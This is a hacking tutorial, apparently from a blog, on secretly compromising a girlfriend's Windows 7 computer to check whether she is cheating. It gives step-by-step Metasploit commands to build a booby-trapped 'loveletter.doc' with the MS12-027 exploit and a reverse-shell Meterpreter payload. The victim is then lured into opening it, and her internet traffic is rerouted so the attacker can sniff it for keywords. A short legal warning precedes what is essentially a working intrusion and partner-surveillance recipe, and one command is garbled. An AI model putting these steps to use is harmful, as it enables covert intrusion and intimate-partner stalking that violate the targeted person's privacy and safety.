Hack Like a Pro: How to Hack Windows 7 to See Whether Your Girlfriend Is Cheating or Not

Welcome back, my hacker apprentices!

Several of you have written asking me how you can check on whether your boyfriend, girlfriend, or spouse is cheating on you, so I dedicate this tutorial to all of you with doubts about the fidelity of your spouse, girlfriend, or boyfriend.

A Fair Warning

Before I start, I want to point out that hacking into somebody's computer is illegal in most countries. What might be the consequences for hacking into a friend's or spouse's computer? Kelly Terry, one of our Null Byte community members, has firsthand experience with her husband, who's now paying a heavy price. She recounts her experience on her blog.

I'm not a relationship counselor or anything of that sort, but if you're worried that your partner is cheating on you, there are only two possibilities. First, they are NOT cheating on you and your paranoia is destructive to the relationship. Second, they ARE cheating on you and you should get out of the relationship.

My point here is that if you're obsessed with jealousy in your relationship, you should either remove that feeling or leave the relationship. Hacking their machine to find evidence is only likely to make the situation worse because you could...

1. End up in prison like Kelly Terry's husband,
2. Find nothing, but that won't relieve the anxiety and jealousy, or
3. Find something, and you knew all along that the relationship was bad for you.

None of these outcomes are good!

Just a warning.

The instructions below are merely for learning purposes.

Step 1: Compromise Her System

Let's fire up BackTrack and Metsploit and figure out a way to compromise her system.

A couple of years back (April 2012), an exploit was found in the wild that you could create a buffer overflow (I'll be doing a tutorial to explain buffer overflows soon) in Windows 7 systems with Office 2007 or Office 2010. Since I know my girlfriend has Windows 7 and Office 2007 on her computer, this just might be the perfect exploit to use on her.

In addition, I often send her little love letters as attachments, so she will not suspect anything if I send another. This time, though, I will embed the Meterpreter so that I can "own" her system and check up on her.

Of course, I think it goes without saying (maybe not?) that this exploit will work with anyone that trusts you enough to open your Word document. Similar tactics are used by spammers and scammers all the time.

When this vulnerability was found in the wild, Microsoft designated it MS12-027. Metasploit developers then wrote an exploit for Metasploit that does exactly the same thing and named it ms12_027_mscomctl_bof. If we want to use it to exploit our girlfriend's computer, we can find it by typing at the msfconsole:

• msf > search ms12_027

This should retrieve just one exploit as above. To avoid typographical errors, simply copy and paste it into the next line like I have done above.

Step 2: Let's Get Some Background Info

If I'm new to an exploit, I like to learn a little about what it does before I start. Let's type:

• msf > info

Notice that this exploit has two potential targets, Microsoft Office 2007 (target 0) and Microsoft Office 2010 (target 1). In addition, in the description it states:

"This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed a specially crafted..."

Notice that it also states "The DEP/ASLR bypass on Office 2010...". For those of you are unfamiliar, DEP is Data Execution Prevention and ASLR is Address Space Layout Randomization. Both are implemented on most operating systems to prevent exactly what we are doing here.

Step 3: Show Targets & Create Doc

Since we're pretty certain she uses Office 2007 and not Office 2010, let's set our target for 2007.

• set target 0

Now, rather than use the generic msf.doc that comes with this exploit, let's give it a name that will entice her to open it. Let's call it loveletter.doc.

• set FILENAME loveletter.doc

We next have to give it a payload and tell it what system it needs to connect back to (LHOST) when she opens it.

• set PAYLOAD windows/meterpreter/reverse_tcp
• set LHOST 192.168.1.111

With all the options set, we type exploit and Metasploit creates our malicious document and places it in the /root/.msf/local directory with a name we gave it, loveletter.doc.

Step 4: Multi Handler

Now that we have the malicious Word file created called loveletter.doc, we next need to open a multi-handler on our Metasploit system to receive the connection when she opens the file.

• use exploit/multi/handler
• set PAYLOAD windows/meterpreter/reverse_tcp
• set LHOST 192.168.1.111
• exploit

Now, as you can see, Metasploit has a listener waiting for a connection from the girlfriend's computer. Let's email her that loveletter.doc and when she opens that file, it will create a Meterpreter session on our computer and we will own her system!

As you can see, she opened the file and a Meterpreter session opened on our computer. We own her system!

Step 5: Verify It's the Right Computer

Just to make certain we're on the right computer, let's get the sysinfo:

• meterpreter > sysinfo

As you can see, it tells us that the system we have compromised is a Windows 7 64-bit computer. That's her machine!

Step 6: Forward Her Internet Traffic Back Through Us

Now that we have control of her system, you can forward all her Internet traffic through your computer. In this way, you can sniff her traffic and search for telltale signs of cheating, such as keywords. You might even setup an intrusion detection system on her traffic looking for keywords that will alert you.

First, forward her traffic to you by typing at the Meterpreter prompt:

• meterpreter> portfwd add -L 192.168.1.100 -l 80 -r 192.168.1.111 -p 80

Next, we need to forward all traffic from her through our computer out to the Internet. We can do that by turning on ipforwarding on on our system. We do that by typing:

• bt > echo 1 /proc/sys/net/ipv4/ipforward

Step 7: Search for Keywords

Now that all her traffic is going through your system, you can view her traffic through Wireshark to see what sites she is visiting and even better, set up Snort to look for keywords in her TCP stream going through our computer.

So now, my hacker apprentices, we have several different ways to hack Windows 7 systems, but we still have more, so keep coming back.

Computer girl image via Shutterstock